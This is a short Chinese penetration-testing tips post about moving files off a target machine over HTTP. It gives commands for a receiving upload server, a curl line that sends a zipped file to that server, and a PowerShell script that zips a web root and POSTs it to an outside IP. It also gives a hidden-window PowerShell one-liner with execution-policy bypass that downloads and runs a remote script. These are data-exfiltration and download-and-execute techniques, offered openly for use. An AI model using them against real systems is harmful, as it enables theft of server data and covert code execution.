【渗透技巧】通过HTTP传文件的新姿势

2018-05-1410:13:50 发表评论

【渗透技巧】通过HTTP传文件的新姿势

在外网机器上运行文件服务接收服务

  1. root@kali:~/pentest-script/FileTransfer/HttpServer# python3 SimpleHttpUpload.py Serving HTTP on 0.0.0.0 port 8000 ...
  2. (True, "File '/root/pentest-script/FileTransfer/HttpServer/mo.zip' upload success!", 'by: ', ('127.0.0.1', 41170))
  3. 127.0.0.1 - - [09/Mar/2018 08:27:55"POST / HTTP/1.1" 200 -

SimpleHTTPUpload.py

部分内容被隐藏
需登陆后可查看

1. 如果是Linux在目标机器上执行CURL发送文件

  1. root@kali:~/Desktop# zip test.zip test.txt
  2. adding: test.txt (deflated 57%)
  3. root@kali:~/Desktop# curl   -F file=@/root/Desktop/test.zip  http://127.0.0.1:8000/ 

2. 如果是windows机器, 可以使用Powershell上传文件

  1. zip.exe -r temp.zip  wwwroot
  2. $fileName = "temp.zip"
  3. $uri = "http://192.168.224.129:8000/"
  4. $currentPath = Convert-Path .
  5. $filePath="$currentPath\$fileName"
  6. $fileBin = [System.IO.File]::ReadAlltext($filePath)
  7. $bodyLines = ("------------------------83cdc2d56002d24a","Content-Disposition: form-data; name=`"file`"; filename=`"$fileName`"","Content-Type: application/octet-stream;",$fileBin,"--------------------------83cdc2d56002d24a--$LF" ) -join  "`r`n"
  8. Invoke-RestMethod -Uri $uri -Method Post -ContentType "multipart/form-data; boundary=------------------------83cdc2d56002d24a" -Body $bodyLines
部分内容被隐藏
评论刷新后查看

或者将powershell存在外网机器上, 下载并执行:

  1. powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('<target>/.ps1');"
CE安全网

发表评论

您必须登录才能发表评论!